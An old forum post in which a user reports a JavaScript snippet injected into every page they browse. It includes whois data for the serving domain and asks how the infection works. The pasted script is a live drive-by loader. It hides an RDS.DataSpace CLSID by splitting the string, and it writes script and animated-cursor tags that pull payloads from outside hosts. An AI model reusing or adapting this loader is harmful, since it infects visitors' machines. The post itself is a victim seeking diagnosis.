Got injected web script while browser any website(what's the virus?)

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

What virus it could be?

While I browser any web page, from the html source I found some
unusual stuff:
<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.goodnetads.org /
main.js"></SCRIPT>

From whois, the domain name just created recently:
-------------------------------------------------------------------------------------
Domain ID:D149809477-LROR
Domain Name:GOODNETADS.ORG
Created On:15-Nov-2007 07:11:35 UTC
Last Updated On:15-Nov-2007 07:11:37 UTC
Expiration Date:15-Nov-2008 07:11:35 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:BE872B07E523EDFE
Registrant Name:wang ming
Registrant Organization:wang ming
Registrant Street1:cccccccc
Registrant Street2:
Registrant Street3:
Registrant City:ccccc
Registrant State/Province:Xizang
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+10.2312312312
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:web@goodnetads.org
Admin ID:BE872B07E523EDFE
Admin Name:wang ming
Admin Organization:wang ming
Admin Street1:cccccccc
Admin Street2:
Admin Street3:
Admin City:ccccc
Admin State/Province:Xizang
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+10.2312312312
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:web@goodnetads.org
Tech ID:BE872B07E523EDFE
Tech Name:wang ming
Tech Organization:wang ming
Tech Street1:cccccccc
Tech Street2:
Tech Street3:
Tech City:ccccc
Tech State/Province:Xizang
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+10.2312312312
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:web@goodnetads.org
Name Server:DNS1.NAME-SERVICES.COM
Name Server:DNS2.NAME-SERVICES.COM
Name Server:DNS3.NAME-SERVICES.COM
Name Server:DNS4.NAME-SERVICES.COM
Name Server:DNS5.NAME-SERVICES.COM
-------------------------------------------------------------------------------------


and the script code is:
-------------------------------------------------------------------------------------
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("Lovemm=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() +  24 * 1 * 60 * 60 * 1000);
document.cookie = "Lovemm=funnyfunny;expires=" +
expires.toGMTString();
try{
var downf = document.createElement("object");
downf.setAttribute("classid",
"clsid:B"+"D9"+"6C"+"556-6"+"5A3-11D"+"0-98"+"3A-00C"+"04FC2"+"9E"+"36");
str="Microsoft.XMLHTTP";
var ab=ab;
var O = downf.CreateObject(str,"");
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://ads.1234214.info/tk.js "></SCR' +
'IPT>');
}
catch(e)
{
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://down.goodnetads.org/tk/xl.js "></SCR' +
'IPT>');
document.write("<DIV style=\"CURSOR: url('http://ads.1234214.info/tk /
ani.c')\"></DIV>");
};
}
-------------------------------------------------------------------------------------

Obviously it's some kind of ads virus, the virus might not on my box,
I checked. And there's no arp spoofing.
I also checked other computers in the same LAN, they also have the
same problem with me.
I handled it with hosts files that direct it to myself.

How could this kind of virus get to work like this way?

Site Timeline